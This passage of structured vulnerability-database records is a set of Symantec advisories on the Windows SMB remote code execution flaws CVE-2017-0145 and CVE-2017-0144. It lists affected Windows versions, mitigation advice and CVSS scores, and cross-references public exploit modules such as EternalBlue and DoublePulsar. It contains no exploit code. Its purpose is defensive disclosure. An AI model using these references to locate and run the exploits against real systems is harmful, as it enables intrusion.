This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n**Do not use client software to access unknown or untrusted hosts from critical systems.** \nDue to the nature of this issue, avoid using the client application to connect to unknown or untrusted hosts.\n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references for more information.\n", "published": "2017-03-14T00:00:00", "modified": "2017-03-14T00:00:00", "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 9.3}, "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/96705", "reporter": "Symantec Security Response", "references": ["https://support.microsoft.com/en-in/help/4013389/title", "https://support.microsoft.com/en-in/help/4012598/title", "https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/", "https://www.wired.com/beyond-the-beyond/2017/04/double-pulsar-nsa-leaked-hacks-wild/"], "cvelist": ["CVE-2017-0145"], "lastseen": "2021-06-08T19:05:22", "history": [{"bulletin": {"affectedSoftware": [{"name": "Microsoft Windows 7 for 32-bit Systems", "operator": "eq", "version": "SP1"}, {"name": "Microsoft Windows Server 2008 for Itanium-based Systems", "operator": "eq", "version": "SP2"}, {"name": "Microsoft Windows Server 2008 R2 for Itanium-based Systems", "operator": "eq", "version": "SP1"}, {"name": "Microsoft Windows 7 for x64-based Systems", "operator": "eq", "version": "SP1"}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2012"}, {"name": 
"Microsoft Windows Server 2008 R2 for x64-based Systems", "operator": "eq", "version": "SP1"}, {"name": "Microsoft Windows RT", "operator": "eq", "version": "8.1"}, {"name": "Microsoft Windows Vista x64 Edition", "operator": "eq", "version": "SP2"}, {"name": "Microsoft Windows Server 2012", "operator": "eq", "version": "R2"}, {"name": "Microsoft Windows", "operator": "eq", "version": "Vista SP2"}, {"name": "Microsoft Windows Server 2008 for x64-based Systems", "operator": "eq", "version": "SP2"}, {"name": "Microsoft Windows Server 2008 for 32-bit Systems", "operator": "eq", "version": "SP2"}], "bulletinFamily": "software", "cvelist": ["CVE-2017-0145"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "### Description\n\nMicrosoft Windows is prone to a remote code-execution vulnerability. Successful exploits will allow an attacker to execute arbitrary code on the target system. Failed attacks will cause denial of service conditions. \n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems\n * Microsoft Windows 10 Version 1607 for x64-based Systems\n * Microsoft Windows 10 for 32-bit Systems\n * Microsoft Windows 10 for x64-based Systems\n * Microsoft Windows 10 version 1511 for 32-bit Systems\n * Microsoft Windows 10 version 1511 for x64-based Systems\n * Microsoft Windows 7 for 32-bit Systems SP1\n * Microsoft Windows 7 for x64-based Systems SP1\n * Microsoft Windows 8.1 for 32-bit Systems\n * Microsoft Windows 8.1 for x64-based Systems\n * Microsoft Windows RT 8.1\n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1\n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1\n * Microsoft Windows Server 2008 for 32-bit Systems SP2\n * Microsoft Windows Server 2008 for Itanium-based Systems SP2\n * Microsoft Windows Server 2008 for x64-based Systems SP2\n * Microsoft Windows Server 2012\n * Microsoft Windows Server 2012 R2\n * Microsoft Windows Vista Service Pack 2\n * Microsoft Windows Vista x64 Edition 
Service Pack 2\n\n### Recommendations\n\n#### Run all software as a nonprivileged user with minimal access rights.\n\nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n#### Deploy network intrusion detection systems to monitor network traffic for malicious activity.\n\nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n#### Do not use client software to access unknown or untrusted hosts from critical systems.\n\nDue to the nature of this issue, avoid using the client application to connect to unknown or untrusted hosts.\n\n#### Implement multiple redundant layers of security.\n\nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities. \n\nUpdates are available. Please see the references for more information. 
\n", "enchantments": {"score": {"modified": "2017-03-15T15:17:00", "value": 8.5}}, "hash": "f7e37aec752da08fe21d30b3c0755dafdb67f92a08670c35c80b871dfd7c7c5f", "history": [], "href": "https://www.symantec.com/security_response/vulnerability.jsp?bid=96705", "id": "SMNTC-96705", "lastseen": "2017-03-15T15:17:00", "modified": "2017-03-14T00:00:00", "objectVersion": "1.4", "published": "2017-03-14T00:00:00", "references": [], "reporter": "Symantec Security Response", "title": "Microsoft Windows SMB Server CVE-2017-0145 Remote Code Execution Vulnerability", "type": "symantec", "viewCount": 13}, "differentElements": ["cvss", "references", "description", "href", "affectedSoftware"], "edition": 1, "lastseen": "2017-03-15T15:17:00"}, {"bulletin": {"_object_type": "robots.models.symantec.SymantecBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.symantec.SymantecBulletin"], "affectedSoftware": [{"name": "Microsoft Windows", "operator": "eq", "version": "10 Version 1607 for x64-based Systems "}, {"name": "Unify OpenStage Xpert", "operator": "eq", "version": "6010p 5R1 "}, {"name": "Microsoft Windows Vista x64 Edition Service Pack", "operator": "eq", "version": "2 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "8 X64 "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2012 R2 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 for x64-based Systems "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2003 x64 SP2 "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2008 R2 for x64-based Systems SP1 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 Version 1607 for 32-bit Systems "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2003 x86 SP2 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "8.1 for 32-bit Systems "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2008 for 32-bit Systems SP2 "}, 
{"name": "Microsoft Windows Vista Service Pack", "operator": "eq", "version": "2 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 for 32-bit Systems "}, {"name": "Microsoft Windows", "operator": "eq", "version": "8 X86 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 version 1511 for x64-based Systems "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2012 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "7 for 32-bit Systems SP1 "}, {"name": "Unify OpenStage Xpert", "operator": "eq", "version": "6010p 5 "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2008 for x64-based Systems SP2 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 version 1511 for 32-bit Systems "}, {"name": "Microsoft Windows", "operator": "eq", "version": "7 for x64-based Systems SP1 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "8.1 for x64-based Systems "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2008 for Itanium-based Systems SP2 "}, {"name": "Microsoft Windows RT", "operator": "eq", "version": "8.1 "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2008 R2 for Itanium-based Systems SP1 "}], "bulletinFamily": "software", "cvelist": ["CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "### Description\n\nMicrosoft Windows is prone to a remote code-execution vulnerability. Successful exploits will allow an attacker to execute arbitrary code on the target system. 
Failed attacks will cause denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8 X64 \n * Microsoft Windows 8 X86 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2003 x64 SP2 \n * Microsoft Windows Server 2003 x86 SP2 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Vista Service Pack 2 \n * Microsoft Windows Vista x64 Edition Service Pack 2 \n * Microsoft Windows XP Embedded SP3 x86 \n * Microsoft Windows XP Sp2 X64 \n * Microsoft Windows XP Sp3 X86 \n * Unify OpenStage Xpert 6010p 5 \n * Unify OpenStage Xpert 6010p 5R1 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. 
This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n**Do not use client software to access unknown or untrusted hosts from critical systems.** \nDue to the nature of this issue, avoid using the client application to connect to unknown or untrusted hosts.\n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references for more information.\n", "edition": 1, "enchantments": {"dependencies": {"modified": "2018-03-12T06:25:08", "references": [{"idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613"], "type": "zdt"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": 
["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"], "type": "threatpost"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"], "type": "metasploit"}, {"idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["MS:CVE-2017-0145"], "type": "mscve"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"], "type": "trendmicroblog"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"], "type": "exploitdb"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}, {"idList": ["CVE-2017-0145"], "type": "cve"}], "rev": 2}, "score": {"modified": "2018-03-12T06:25:08", "rev": 2, "value": 8.5, "vector": "NONE"}}, "hash": "144a9d84179cedcbcb0c983b778067361365e1dc871eae6528d5353d918e6462", "hashmap": [{"hash": "0ceb24f9631084ba620bf1a65ce8dd09", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "6e85843f0a1ea97153b93d90b1fbe01c", "key": "cvelist"}, {"hash": 
"b8d2e9770277e4a8198efeee8a25dfbc", "key": "modified"}, {"hash": "dee2d346525c42556b1833b21cb142d8", "key": "_object_types"}, {"hash": "ae9f420b26fd277e3efcc881d7d236ae", "key": "description"}, {"hash": "52e3bbafc627009ac13caff1200a0dbf", "key": "type"}, {"hash": "f9fa10ba956cacf91d7878861139efb9", "key": "bulletinFamily"}, {"hash": "38af5596de2fce76e4eb62aa066bbcdb", "key": "_object_type"}, {"hash": "abcb22f27c94091dc024c94de8b306a3", "key": "href"}, {"hash": "b8d2e9770277e4a8198efeee8a25dfbc", "key": "published"}, {"hash": "71cae0a4314c6ca0b4b915f8febd133b", "key": "title"}, {"hash": "12432522d29cb6b9b409867cd87e588e", "key": "references"}, {"hash": "d6218597dc7a1b025a781373296b2b63", "key": "reporter"}], "history": [], "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/96705", "id": "SMNTC-96705", "immutableFields": [], "lastseen": "2018-03-12T06:25:08", "modified": "2017-03-14T00:00:00", "objectVersion": "1.5", "published": "2017-03-14T00:00:00", "references": ["https://support.microsoft.com/en-in/help/4013389/title", "https://support.microsoft.com/en-in/help/4012598/title", "https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/", "https://www.wired.com/beyond-the-beyond/2017/04/double-pulsar-nsa-leaked-hacks-wild/"], "reporter": "Symantec Security Response", "title": "Microsoft Windows SMB Server CVE-2017-0145 Remote Code Execution Vulnerability", "type": "symantec", "viewCount": 590}, "different_elements": ["affectedSoftware"], "edition": 1, "lastseen": "2018-03-12T06:25:08"}], "viewCount": 702, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", 
"MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0200"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", 
"RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-06-08T19:05:22", "rev": 2}, "score": {"value": 8.6, "vector": "NONE", "modified": "2021-06-08T19:05:22", "rev": 2}}, "objectVersion": "1.5", "affectedSoftware": [{"name": "unify openstage xpert", "operator": "eq", "version": "6010p 5 "}, {"name": "microsoft windows", "operator": "eq", "version": "8.1 for 32-bit Systems "}, {"name": "microsoft windows", "operator": "eq", "version": "7 for x64-based Systems SP1 "}, {"name": "microsoft windows", "operator": "eq", "version": "10 Version 1607 for 32-bit Systems "}, {"name": "microsoft windows vista x64 edition service pack", "operator": "eq", "version": "2 "}, {"name": "microsoft windows", "operator": "eq", "version": "7 for 32-bit Systems SP1 "}, {"name": "microsoft windows", "operator": "eq", "version": "8 X64 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2008 for 32-bit Systems SP2 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2012 R2 "}, {"name": "microsoft windows", "operator": "eq", "version": "10 Version 1607 for x64-based Systems "}, {"name": "microsoft windows", "operator": "eq", "version": "10 for x64-based Systems "}, {"name": "microsoft windows server", "operator": "eq", "version": "2003 x86 SP2 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2012 "}, {"name": "microsoft windows", "operator": "eq", "version": "10 version 1511 for 32-bit Systems "}, {"name": "microsoft windows", "operator": "eq", "version": "8.1 for 
x64-based Systems "}, {"name": "microsoft windows server", "operator": "eq", "version": "2008 R2 for x64-based Systems SP1 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2003 x64 SP2 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2008 R2 for Itanium-based Systems SP1 "}, {"name": "unify openstage xpert", "operator": "eq", "version": "6010p 5R1 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2008 for x64-based Systems SP2 "}, {"name": "microsoft windows rt", "operator": "eq", "version": "8.1 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2008 for Itanium-based Systems SP2 "}, {"name": "microsoft windows", "operator": "eq", "version": "10 version 1511 for x64-based Systems "}, {"name": "microsoft windows", "operator": "eq", "version": "8 X86 "}, {"name": "microsoft windows vista service pack", "operator": "eq", "version": "2 "}, {"name": "microsoft windows", "operator": "eq", "version": "10 for 32-bit Systems "}], "_object_type": "robots.models.symantec.SymantecBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.symantec.SymantecBulletin"], "immutableFields": [], "edition": 2, "hashmap": [{"key": "_object_type", "hash": "38af5596de2fce76e4eb62aa066bbcdb"}, {"key": "_object_types", "hash": "dee2d346525c42556b1833b21cb142d8"}, {"key": "affectedSoftware", "hash": "c74a882435f0574ba322c965844414a4"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "6e85843f0a1ea97153b93d90b1fbe01c"}, {"key": "cvss", "hash": "2076413bdcb42307d016f5286cbae795"}, {"key": "description", "hash": "ae9f420b26fd277e3efcc881d7d236ae"}, {"key": "href", "hash": "abcb22f27c94091dc024c94de8b306a3"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "b8d2e9770277e4a8198efeee8a25dfbc"}, {"key": "published", "hash": "b8d2e9770277e4a8198efeee8a25dfbc"}, {"key": "references", "hash": 
"12432522d29cb6b9b409867cd87e588e"}, {"key": "reporter", "hash": "d6218597dc7a1b025a781373296b2b63"}, {"key": "title", "hash": "71cae0a4314c6ca0b4b915f8febd133b"}, {"key": "type", "hash": "52e3bbafc627009ac13caff1200a0dbf"}], "scheme": null, "cvss2": {}, "cvss3": {}}, {"id": "SMNTC-96704", "hash": "cdb3d06d69978ad720cbb0c1457bfd23d95fe80395902fcd73d43b26c759c042", "type": "symantec", "bulletinFamily": "software", "title": "Microsoft Windows SMB Server CVE-2017-0144 Remote Code Execution Vulnerability", "description": "### Description\n\nMicrosoft Windows is prone to a remote code-execution vulnerability. Successful exploits will allow an attacker to execute arbitrary code on the target system. Failed attacks will cause denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8 X64 \n * Microsoft Windows 8 X86 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2003 x64 SP2 \n * Microsoft Windows Server 2003 x86 SP2 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Vista Service Pack 2 \n * Microsoft Windows Vista x64 Edition Service Pack 2 \n * Microsoft Windows 
XP Embedded SP3 x86 \n * Microsoft Windows XP Sp2 X64 \n * Microsoft Windows XP Sp3 X86 \n * Unify OpenStage Xpert 6010p 5 \n * Unify OpenStage Xpert 6010p 5R1 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n**Do not use client software to access unknown or untrusted hosts from critical systems.** \nDue to the nature of this issue, avoid using the client application to connect to unknown or untrusted hosts.\n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. 
Please see the references for more information.\n", "published": "2017-03-14T00:00:00", "modified": "2017-03-14T00:00:00", "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 9.3}, "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/96704", "reporter": "Symantec Security Response", "references": ["https://support.microsoft.com/en-in/help/4013389/title", "https://support.microsoft.com/en-in/help/4012598/title", "https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/", "https://www.wired.com/beyond-the-beyond/2017/04/double-pulsar-nsa-leaked-hacks-wild/"], "cvelist": ["CVE-2017-0144"], "lastseen": "2021-06-08T19:05:22", "history": [{"bulletin": {"_object_type": "robots.models.symantec.SymantecBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.symantec.SymantecBulletin"], "affectedSoftware": [{"name": "Microsoft Windows", "operator": "eq", "version": "10 Version 1607 for x64-based Systems "}, {"name": "Unify OpenStage Xpert", "operator": "eq", "version": "6010p 5R1 "}, {"name": "Microsoft Windows Vista x64 Edition Service Pack", "operator": "eq", "version": "2 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "8 X64 "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2012 R2 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 for x64-based Systems "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2003 x64 SP2 "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2008 R2 for x64-based Systems SP1 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 Version 1607 for 32-bit Systems "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2003 x86 SP2 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "8.1 for 32-bit Systems "}, {"name": "Microsoft Windows Server", "operator": "eq", 
"version": "2008 for 32-bit Systems SP2 "}, {"name": "Microsoft Windows Vista Service Pack", "operator": "eq", "version": "2 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 for 32-bit Systems "}, {"name": "Microsoft Windows", "operator": "eq", "version": "8 X86 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 version 1511 for x64-based Systems "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2012 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "7 for 32-bit Systems SP1 "}, {"name": "Unify OpenStage Xpert", "operator": "eq", "version": "6010p 5 "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2008 for x64-based Systems SP2 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 version 1511 for 32-bit Systems "}, {"name": "Microsoft Windows", "operator": "eq", "version": "7 for x64-based Systems SP1 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "8.1 for x64-based Systems "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2008 for Itanium-based Systems SP2 "}, {"name": "Microsoft Windows RT", "operator": "eq", "version": "8.1 "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2008 R2 for Itanium-based Systems SP1 "}], "bulletinFamily": "software", "cvelist": ["CVE-2017-0144"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "### Description\n\nMicrosoft Windows is prone to a remote code-execution vulnerability. Successful exploits will allow an attacker to execute arbitrary code on the target system. 
